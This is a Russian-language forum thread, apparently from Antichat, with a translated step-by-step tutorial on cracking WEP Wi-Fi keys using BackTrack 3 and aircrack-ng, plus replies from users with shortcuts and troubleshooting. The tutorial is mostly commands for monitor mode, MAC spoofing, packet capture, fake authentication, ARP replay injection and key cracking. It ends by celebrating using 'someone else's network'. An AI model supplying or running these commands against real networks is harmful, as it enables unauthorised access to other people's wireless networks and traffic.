![]() |
Взлом WEP с помощью BactTrack 3
Для взлома WEP ключа нам понадобится:
- BactTrack 3 - подходящий wifi адаптер(список). - Точка доступа с WEP-шифрованием - Базовое знание терминов .::Подготовка WIFI адаптера::. Способ #1: Набираем в консоли: Код:
iwconfigКод:
bt ~ # iwconfigчтобы взломать сеть нужно перевести её в режим мониторинга. Для этого пишем: Код:
wlanconfig ath1 create wlandev wifi0 wlanmode monitorСпособ #2: Код:
iwconfigКод:
airmon-ng stop [device]Код:
ifconfig down [interface]Код:
macchanger --mac 00:11:22:33:44:66 [device]Код:
airmon-ng start [device].::Атакуем цель::. Ищем сеть с WEP шифрованием командой: Код:
airodump-ng [device]Запишите MAC адрес сети(BSSID) ключ которой хотите найти , канал (CH) и имя (ESSID). Теперь нужно начинать собирать данные с точки доступа сети для атаки: Код:
airodump-ng -c [channel] -w [network.out] –bssid [bssid] [device]Эта команда выведет данные в файл network.out. Затем нужно скормить этот файл другой программе и золотой ключик наш ;) . Откройте другую консоль (оставив эту работать). Теперь нужно сгенерить поддельные пакеты чтобы заставить точку доступа передавать больше данных необходимых для поиска ключа. Протестируйте точку доступа следующей командой: Код:
aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:66 -e [essid] [device]Если всё прошло успешно можно начинать генерировать множество пакетов чтобы взломать WEP ключ: Код:
aireplay-ng -3 -b [bssid] -h 00:11:22:33:44:66 [device]Это заставит точку доступа передать множество пакетов которые мы будем использовать для взлома ключа. Переключитесь на airodump-ng работающий в другой консоли и вы увидите как число "data" пакетов растет со временем. http://thew0rd.com/wp-content/galler...ptureivs_0.png После того как количество пакетов достигнет 10000-20000 (чем больше пакетов тем быстрее будет найден ключ) можно запускать aircrack. Если не получается получить от точки доступа пакеты вышеописанным способом попробуйте ввести: Код:
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [bssid] -h 00:11:22:33:44:66 [device]Теперь, когда вы собрали достаточное количество пакетов для взлома можно приступать собственно к взлому: Код:
aircrack-ng -n 128 -b [bssid] [filename]-01.caphttp://thew0rd.com/wp-content/galler...ck/crackng.png Всё, ключ найден можно выходить в интернет с помощью чужой сети ;) Источник Переведено и дополнено jawbreaker специально для Античат.ру! |
на самом деле я вызываю
aircrack-ng *.cap и не парюсь, да и для вепа можно параметр -i поставить, тогда собирать будет только ключи инициализации (IVs) файлы тогда будут сохраняться как *.ivs |
Люди явно отстают от жизни))) ставим spoonwep2 и весь взлом упрощается до неузноваемости) пару кликов и через 5 минут у тебя уже ключик) конечно иногда попадаются такие сети где без рук не обойтись, но это редкость))
|
ifconfig down [interface] - что должно быть вместо [interface]?
|
Цитата:
в случае с wi-fi ath0 в случае с ethrnet eth0 |
У меня карта Intel, вместо [device] писал wlan0.. Помоему карты Atheros определяются как ath0 ?..
|
2 способа нагона пакетов не срабатывают ... Это из за чего может быть ? адаптер Edimax EW-7318USG
|
|
Основная проблема в том, что сначала нужно провести фейковую авторизацию, а потом нагонять пакеты.
|
хмммм... может на AP стоит mac фильтр , хотя я на 3 точки генил.
карта моожет ешё .... :confused: |
| Время: 22:19 |